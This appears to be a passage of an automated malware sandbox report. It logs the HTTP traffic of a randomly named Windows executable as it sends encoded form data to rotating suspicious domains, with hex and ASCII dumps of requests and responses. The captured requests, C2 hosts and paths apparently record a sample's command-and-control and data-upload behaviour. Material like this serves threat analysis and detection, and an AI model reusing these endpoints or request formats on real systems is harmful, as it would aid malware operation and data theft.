                                                                      Data Ascii: x2q=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uTQ0TI74aZH3Dez1rDVwA0gqVYsTzVdmU4sXcMUgg1H4Io7wx3BT3SsUXqsG5bu9uKYHFxEp1+cboofZqidg6nToDWzCqbePJI7agld1FhLDedSKxVi+laN2FQMhOGfgwqOfYiWCRPIL6BmRsL7JGEwl/r9hVKdIKkn/Cz8PTD3b06kJeAnfBir/iXvFKG14ZuQi8PLPaSy2uynHaqUp2EA8duC0hA9adnbFLBfeQgnbRQloLFAXsx9qIuX53SOjGGgJhvht7J67hMDCP3eLM5FCFQomYGE2dvaG5mRYsHBQihFb3p3W2jezpBR7aCqqew2WkkXtoiholR9tSi0j+3J+rH6Qlan1F8lXD5OkDFfl+Tm8CZMxngVLTIZW4XTUNkEuGvjf41rtrQfeSsXfoq7rGm9R8MIbkcoFtej2DenAJoMnm4JyzAoRAFr69QVLgO9CYdFgihTSWz5K8hvF1Xz5vP7RIT0VbmlG0eZbQPPS4vPPSGO+XKav1MzuPIpeyJI5eBHHtCTfX3MTubHFAZql70Y0/EvYnu3NpODgcw/kUKH8zhN6kapAazrHaJJimi8NDHdEX3Y9K9JNO4z0VNi3Wrt+2fuqflVfu7EtsPlyfvSOFAQ9rq5lJ1Ki7+hWKOz+p4n3hTl2zX+yiWKnKzAQbtBC0923HtEZZJmPTZ8jrUPW7DXGS07RY3qUJ+vZx1bCNV4IQ561TO4JgJNSFoSIDRRdTywcx6aDsfMOLTKJEmG7xh6U54CdLvolvRb+EiQE9ldRlEAYTLjL+6duWRG+kf7BTWAnGoxMGzAWNCcnhtHZPV3ThBeomPgc2GlE40dUlTi9fgvdDr1VN5rsZTqdSkeEwZUV8MENn4x3KHGGYTbSDexLGlnr76Clf/ltqFz4fF3RIpRT7ZXfgEPlLSv2DBSZnXdn56fP4Tn7RnN82Gs1zQ2YStRphtPrpAUwxs2GQVf [TRUNCATED]
                                                                      Dec 10, 2024 15:16:10.623449087 CET973INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:16:10 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LiloxfpW4ofiRgL9dZ112j%2FhxE0aGmEmOsDmQ8dzJrFpTKtzrtkFk3VdY92kv0%2Bt6w9Bi9heaMVTQYNh5N9XESqEO909xY3RGxN8GmQfdM1cEH7pnohM3lOfSbFUMyO988V09ak%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8efdd9e8ee914339-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1683&rtt_var=841&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1659&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.1149724104.21.64.1805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:12.375063896 CET360OUTGET /v89f/?x2q=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9khdU1gh7QaWeiWgu/JIX+7JexMxtriwWCLY0=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.bser101pp.buzz
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:13.456697941 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:16:13 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mjJesKHa8E3doiFRZ2guS%2ByCTAbJxKN9hZsC29m9A14i4gCTlLv%2BCmV03c3QdUGbEferlbX8lvA48TKrsvFN0QP0by876%2Fi3kPxLDOvDmYNOZ7G8TXB6qHk5J6BRLCEKzYNSnW4%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8efdd9fa8ae27277-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2022&rtt_var=1011&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=360&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                      Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome fr
                                                                      Dec 10, 2024 15:16:13.456813097 CET97INData Raw: 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61
                                                                      Data Ascii: iendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.11497253.33.130.190805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:19.377182961 CET647OUTPOST /8m07/ HTTP/1.1
                                                                      Host: www.goldstarfootwear.shop
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.goldstarfootwear.shop
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.goldstarfootwear.shop/8m07/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 70 6a 46 4e 78 44 50 73 76 71 2f 54 74 6e 2f 76 71 58 52 64 72 6b 33 52 50 4b 4e 49 58 73 6c 44 6f 70 6c 67 5a 73 36 55 59 44 35 6a 6c 31 5a 31 51 50 63 2b 7a 77 5a 4d 38 37 34 41 52 77 76 77 74 4d 4d 48 54 72 2f 61 51 49 50 6d 38 62 56 6c 5a 31 31 4e 45 2b 33 4d 43 33 51 4d 7a 44 66 6b 45 5a 65 57 44 77 75 36 62 54 36 4c 35 49 30 4e 36 6a 6c 66 68 55 68 6f 62 43 74 32 78 67 32 67 4f 79 58 6c 56 74 47 6f 62 52 48 4d 30 4f 4c 79 6c 51 41 2f 6a 38 77 44 4b 72 75 6a 46 4d 79 68 41 6e 57 37 35 34 52 4a 5a 77 6d 33 30 39 6d 6e 77 45 73 51 64 41 3d 3d
                                                                      Data Ascii: x2q=7fvor6a+xd+5pjFNxDPsvq/Ttn/vqXRdrk3RPKNIXslDoplgZs6UYD5jl1Z1QPc+zwZM874ARwvwtMMHTr/aQIPm8bVlZ11NE+3MC3QMzDfkEZeWDwu6bT6L5I0N6jlfhUhobCt2xg2gOyXlVtGobRHM0OLylQA/j8wDKrujFMyhAnW754RJZwm309mnwEsQdA==
                                                                      Dec 10, 2024 15:16:20.465555906 CET73INHTTP/1.1 405 Method Not Allowed
                                                                      content-length: 0
                                                                      connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.11497263.33.130.190805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:22.046566010 CET667OUTPOST /8m07/ HTTP/1.1
                                                                      Host: www.goldstarfootwear.shop
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.goldstarfootwear.shop
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.goldstarfootwear.shop/8m07/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 76 44 56 4e 7a 6b 37 73 37 36 2f 63 78 58 2f 76 6a 33 52 42 72 6b 37 52 50 4f 55 54 58 65 52 44 6f 49 56 67 66 64 36 55 49 54 35 6a 74 56 5a 77 55 50 63 44 7a 77 64 79 38 36 45 41 52 77 72 77 74 4e 38 48 54 34 48 56 51 59 50 6b 30 37 56 6e 57 56 31 4e 45 2b 33 4d 43 33 46 70 7a 44 48 6b 45 70 75 57 43 56 4f 35 57 7a 36 4b 6f 49 30 4e 70 7a 6c 54 68 55 67 4e 62 44 77 6a 78 6d 36 67 4f 7a 6e 6c 4d 63 47 72 56 68 48 43 33 2b 4b 64 75 46 68 6f 6b 50 45 58 55 6f 71 72 42 34 47 61 49 42 62 68 70 62 59 65 61 6a 75 31 67 62 48 58 35 31 4a 5a 47 4c 34 30 5a 77 68 36 4d 41 6a 61 48 52 49 45 4a 54 46 71 39 79 63 3d
                                                                      Data Ascii: x2q=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeRDoIVgfd6UIT5jtVZwUPcDzwdy86EARwrwtN8HT4HVQYPk07VnWV1NE+3MC3FpzDHkEpuWCVO5Wz6KoI0NpzlThUgNbDwjxm6gOznlMcGrVhHC3+KduFhokPEXUoqrB4GaIBbhpbYeaju1gbHX51JZGL40Zwh6MAjaHRIEJTFq9yc=
                                                                      Dec 10, 2024 15:16:23.122889042 CET73INHTTP/1.1 405 Method Not Allowed
                                                                      content-length: 0
                                                                      connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.11497273.33.130.190805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:24.714791059 CET1680OUTPOST /8m07/ HTTP/1.1
                                                                      Host: www.goldstarfootwear.shop
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.goldstarfootwear.shop
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.goldstarfootwear.shop/8m07/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 76 44 56 4e 7a 6b 37 73 37 36 2f 63 78 58 2f 76 6a 33 52 42 72 6b 37 52 50 4f 55 54 58 65 4a 44 6f 61 4e 67 63 2b 53 55 61 44 35 6a 6a 31 5a 78 55 50 63 53 7a 77 6c 32 38 36 49 71 52 79 44 77 74 76 45 48 47 35 48 56 65 59 50 6b 34 62 56 6d 5a 31 31 59 45 39 4f 46 43 33 56 70 7a 44 48 6b 45 71 32 57 4c 67 75 35 46 6a 36 4c 35 49 30 6f 36 6a 6b 47 68 51 4e 77 62 44 6c 59 78 57 61 67 4f 51 66 6c 4f 4f 65 72 54 78 48 41 2b 75 4b 46 75 46 6b 76 6b 4c 6c 35 55 70 75 56 42 2f 79 61 4b 67 32 68 72 70 73 44 42 79 36 63 36 62 48 71 35 47 5a 61 4b 35 63 32 57 7a 78 6b 5a 77 6e 39 41 69 59 49 64 7a 46 2b 6f 69 71 79 70 76 44 62 58 44 70 74 72 36 74 46 31 54 70 50 37 57 37 6f 75 78 63 58 79 5a 6e 4e 63 4e 51 41 6b 2b 52 35 67 69 45 77 54 4b 69 4b 57 43 45 37 56 57 6c 68 52 79 47 4d 75 56 6b 54 67 64 30 53 58 45 33 2b 57 4a 35 69 6c 72 68 72 48 42 4b 6b 33 78 32 4d 7a 68 61 48 63 79 67 50 57 69 4f 44 4c 55 59 72 42 43 44 34 78 52 79 44 75 76 62 48 30 76 42 33 67 46 [TRUNCATED]
                                                                      Data Ascii: x2q=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeJDoaNgc+SUaD5jj1ZxUPcSzwl286IqRyDwtvEHG5HVeYPk4bVmZ11YE9OFC3VpzDHkEq2WLgu5Fj6L5I0o6jkGhQNwbDlYxWagOQflOOerTxHA+uKFuFkvkLl5UpuVB/yaKg2hrpsDBy6c6bHq5GZaK5c2WzxkZwn9AiYIdzF+oiqypvDbXDptr6tF1TpP7W7ouxcXyZnNcNQAk+R5giEwTKiKWCE7VWlhRyGMuVkTgd0SXE3+WJ5ilrhrHBKk3x2MzhaHcygPWiODLUYrBCD4xRyDuvbH0vB3gFPmzp6BvBKNq2htH0szSm9kR6nDs5yuIrrMbb+RYd7wvrktRVZGD2ELuf6VcmAyw4KH3UvrsytB4nzblTf3n2rzZLusL6yQtlo4Fr45x4FR0QDaZmkMNDED+V58DFGHAOhU1AzM6iFAdDBn+5k/WfpR4KPbNxRQPuW4aV/KAREIP+5ql5X7Ulj23N5RpUPjOKvpclNmBoVCPTQ5wvNSck0khWkZVspl9cTWvsUOk7lgj8pw5RPSZonTN25mLr+83lRDsHHOAK9eZTxdsE5v+Pa2YUi6KZTWqXV5tGFgxciFKLvejb0+mY69jYFmYBbZ+ryKr04lT/U7jDq1isTO59GSGNk8Eyuk2xly6UD7W5dbLzEOqz+9dBM3IrFv8NCx5HhZi2ztY0fmfGbd1cuJo3E08xzuhQJEtuy9GzjOpCnVDd7MLjacnsrDsD7pcDOEU5qWlBDbePeaDvQ7NnQBF1/fG6XZmoKBKWPdFCHIIzT6fvRFe+eiWaO4fK0Fev3aIsazLJ94hnsdJteyV5wVqwBPdV56RSE+eKRXpKwSah28vPloYGVMD0Uds90rT7pb5fwfzMAIwOaqCq6zlG6nQjLseSG1687t9RILZjaG9j0co0cdq0KpeZJCbCZVV4BWsf5k7c+qakH5owGpCajyKyTptXu3aY2Kuf2S [TRUNCATED]
                                                                      Dec 10, 2024 15:16:25.795277119 CET73INHTTP/1.1 405 Method Not Allowed
                                                                      content-length: 0
                                                                      connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.11497283.33.130.190805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:27.381664038 CET367OUTGET /8m07/?x2q=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrHP/N37p6QmtlKoXALFEyxzy3Eq+MEUnkUgU=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.goldstarfootwear.shop
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:29.308307886 CET378INHTTP/1.1 200 OK
                                                                      content-type: text/html
                                                                      date: Tue, 10 Dec 2024 14:16:29 GMT
                                                                      content-length: 257
                                                                      connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 32 71 3d 32 64 48 49 6f 50 53 2f 38 75 53 6d 6e 30 55 51 77 42 58 76 6b 5a 37 46 73 69 4b 78 39 55 64 76 33 6c 58 70 47 2b 5a 37 5a 66 52 33 2f 72 31 4d 41 36 79 66 61 53 45 75 75 58 31 67 63 50 74 75 30 48 70 6c 78 4b 55 48 42 77 2b 53 72 4f 51 4b 4d 4a 72 72 48 50 2f 4e 33 37 70 36 51 6d 74 6c 4b 6f 58 41 4c 46 45 79 78 7a 79 33 45 71 2b 4d 45 55 6e 6b 55 67 55 3d 26 47 6e 36 44 3d 35 66 4e 4c 4e 38 71 68 71 42 33 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x2q=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrHP/N37p6QmtlKoXALFEyxzy3Eq+MEUnkUgU=&Gn6D=5fNLN8qhqB3P"}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.1149729161.97.142.144805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:34.951370001 CET623OUTPOST /6m2n/ HTTP/1.1
                                                                      Host: www.070002018.xyz
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.070002018.xyz
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.070002018.xyz/6m2n/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 56 79 52 37 78 45 69 51 41 42 6b 6f 30 56 42 6f 55 6a 79 69 75 34 37 4d 58 73 33 74 42 36 48 73 4e 72 38 4f 67 39 54 6f 79 48 72 47 36 6e 4d 6f 36 2f 61 65 75 76 56 39 4b 59 64 4e 2f 58 64 42 4d 5a 32 73 4c 74 53 72 63 72 55 37 75 4f 48 37 51 6d 39 37 2f 59 64 65 2b 56 45 59 50 54 55 64 37 46 4e 4b 76 59 64 43 31 35 4c 48 65 75 68 4c 70 50 46 6c 45 72 57 73 6d 52 48 57 4e 36 2f 5a 35 31 66 7a 6e 74 2b 66 47 5a 4a 4e 64 79 47 56 4c 6d 57 2b 52 69 35 6b 62 64 79 44 75 79 78 39 38 55 39 73 38 53 6f 57 78 54 38 32 46 4a 46 39 75 36 6b 2f 49 69 6f 56 41 54 50 50 6c 53 65 71 32 67 3d 3d
                                                                      Data Ascii: x2q=VyR7xEiQABko0VBoUjyiu47MXs3tB6HsNr8Og9ToyHrG6nMo6/aeuvV9KYdN/XdBMZ2sLtSrcrU7uOH7Qm97/Yde+VEYPTUd7FNKvYdC15LHeuhLpPFlErWsmRHWN6/Z51fznt+fGZJNdyGVLmW+Ri5kbdyDuyx98U9s8SoWxT82FJF9u6k/IioVATPPlSeq2g==
                                                                      Dec 10, 2024 15:16:36.180996895 CET1236INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:35 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      ETag: W/"66cce1df-b96"
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                      Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                      Dec 10, 2024 15:16:36.181082964 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                      Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.1149730161.97.142.144805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:16:37.626610994 CET643OUTPOST /6m2n/ HTTP/1.1
                                                                      Host: www.070002018.xyz
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.070002018.xyz
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.070002018.xyz/6m2n/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 56 79 52 37 78 45 69 51 41 42 6b 6f 30 30 78 6f 52 41 61 69 2f 49 37 4e 59 4d 33 74 59 71 47 6e 4e 72 77 4f 67 38 6d 76 79 30 50 47 30 6c 55 6f 37 39 2b 65 2b 2f 56 39 43 34 63 46 79 33 64 65 4d 5a 79 65 4c 70 61 72 63 72 41 37 75 4b 44 37 52 51 31 34 35 59 64 59 6e 46 45 61 4c 54 55 64 37 46 4e 4b 76 59 4a 37 31 39 6e 48 5a 64 35 4c 6f 75 46 6d 4e 4c 57 72 6e 52 48 57 4a 36 2b 65 35 31 66 52 6e 6f 66 36 47 62 78 4e 64 7a 32 56 4c 53 4b 68 59 69 35 69 47 4e 7a 4c 6f 53 6f 4a 39 6d 38 37 77 30 67 71 37 54 38 41 45 50 49 6e 2b 5a 74 6f 4c 78 67 58 55 31 75 2f 73 6a 37 6a 74 6b 6f 30 65 7a 33 6c 5a 45 56 4b 78 51 57 6d 52 33 38 78 45 31 6f 3d
                                                                      Data Ascii: x2q=VyR7xEiQABko00xoRAai/I7NYM3tYqGnNrwOg8mvy0PG0lUo79+e+/V9C4cFy3deMZyeLparcrA7uKD7RQ145YdYnFEaLTUd7FNKvYJ719nHZd5LouFmNLWrnRHWJ6+e51fRnof6GbxNdz2VLSKhYi5iGNzLoSoJ9m87w0gq7T8AEPIn+ZtoLxgXU1u/sj7jtko0ez3lZEVKxQWmR38xE1o=
                                                                      Dec 10, 2024 15:16:38.850297928 CET1236INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:38 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      ETag: W/"66cce1df-b96"
                                                                      Content-Encoding: gzip
